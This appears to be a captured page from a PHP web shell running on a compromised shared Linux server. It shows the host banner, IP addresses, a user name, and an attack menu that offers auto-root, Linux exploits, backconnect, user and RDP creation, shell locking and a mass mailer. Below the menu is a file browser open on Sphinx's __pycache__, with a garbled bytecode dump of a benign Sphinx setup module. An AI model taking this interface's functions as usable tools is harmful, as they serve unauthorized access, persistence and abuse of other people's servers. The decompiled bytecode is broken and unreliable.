Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
sphinx /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
1.11
KB
-rw-r--r--
__main__.cpython-310.pyc
458
B
-rw-r--r--
addnodes.cpython-310.pyc
19.6
KB
-rw-r--r--
application.cpython-310.pyc
48.6
KB
-rw-r--r--
config.cpython-310.pyc
16.19
KB
-rw-r--r--
deprecation.cpython-310.pyc
3.71
KB
-rw-r--r--
errors.cpython-310.pyc
4.93
KB
-rw-r--r--
events.cpython-310.pyc
4.16
KB
-rw-r--r--
extension.cpython-310.pyc
2.25
KB
-rw-r--r--
highlighting.cpython-310.pyc
4.92
KB
-rw-r--r--
io.cpython-310.pyc
6.76
KB
-rw-r--r--
jinja2glue.cpython-310.pyc
7.1
KB
-rw-r--r--
parsers.cpython-310.pyc
4.34
KB
-rw-r--r--
project.cpython-310.pyc
3.32
KB
-rw-r--r--
pygments_styles.cpython-310.py...
2.69
KB
-rw-r--r--
registry.cpython-310.pyc
17.06
KB
-rw-r--r--
roles.cpython-310.pyc
11.55
KB
-rw-r--r--
setup_command.cpython-310.pyc
5.83
KB
-rw-r--r--
theming.cpython-310.pyc
7.92
KB
-rw-r--r--
versioning.cpython-310.pyc
4.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setup_command.cpython-310.pyc
o �$�ap � @ s� d Z ddlZddlZddlmZ ddlmZ ddlmZ ddl m Z mZ ddlm Z ddlmZ dd lmZmZ dd lmZmZ ddlmZ G dd � d e�ZdS )a? sphinx.setup_command ~~~~~~~~~~~~~~~~~~~~ Setuptools/distutils commands to assist the building of sphinx documentation. :author: Sebastian Wiesner :contact: basti.wiesner@gmx.net :copyright: Copyright 2007-2021 by the Sphinx team, see AUTHORS. :license: BSD, see LICENSE for details. � N)�Command)�DistutilsExecError)�StringIO)�Any�Dict)�Sphinx)�handle_exception)�color_terminal�nocolor)�docutils_namespace�patch_docutils)�abspathc @ sP e Zd ZdZdZg d�Zg d�Zddd�Zdefd d �Z ddd�Z dd d�ZdS )�BuildDoca9 Distutils command to build Sphinx documentation. The Sphinx build can then be triggered from distutils, and some Sphinx options can be set in ``setup.py`` or ``setup.cfg`` instead of Sphinx's own configuration file. For instance, from `setup.py`:: # this is only necessary when not using setuptools/distribute from sphinx.setup_command import BuildDoc cmdclass = {'build_sphinx': BuildDoc} name = 'My project' version = '1.2' release = '1.2.0' setup( name=name, author='Bernard Montgomery', version=release, cmdclass=cmdclass, # these are optional and override conf.py settings command_options={ 'build_sphinx': { 'project': ('setup.py', name), 'version': ('setup.py', version), 'release': ('setup.py', release)}}, ) Or add this section in ``setup.cfg``:: [build_sphinx] project = 'My project' version = 1.2 release = 1.2.0 zBuild Sphinx documentation))� fresh-env�Ezdiscard saved environment)� all-files�azbuild all files)zsource-dir=�szSource directory)z build-dir=NzBuild directory)zconfig-dir=�cz'Location of the configuration directory)zbuilder=�bz]The builder (or builders) to use. Can be a comma- or space-separated list. Defaults to "html")�warning-is-error�WzTurn warning into errors)zproject=NzThe documented project's name)zversion=NzThe short X.Y version)zrelease=Nz.The full version, including alpha/beta/rc tags)ztoday=NzCHow to format the current date, used as the replacement for |today|)� link-index�iz!Link index.html to the master doc)� copyrightNzThe copyright string)�pdbNzStart pdb on exception)� verbosity�vz$increase verbosity (can be repeated))�nitpicky�nz1nit-picky mode, warn about all missing references)z keep-goingNz)With -W, keep going when getting warnings)r r r r r �returnNc C sx d | _ | _d| _d | _d | _d| _d| _d| _d| _d| _ d| _ d | _d| _d| _ | jjd | _d| _d| _d| _d S )NF�html� � )� fresh_env� all_filesr � source_dir� build_dir�builder�warning_is_error�project�version�release�today� config_dir� link_indexr �distribution�verboser � tracebackr � keep_going��self� r6 �6/usr/lib/python3/dist-packages/sphinx/setup_command.py�initialize_options[ s"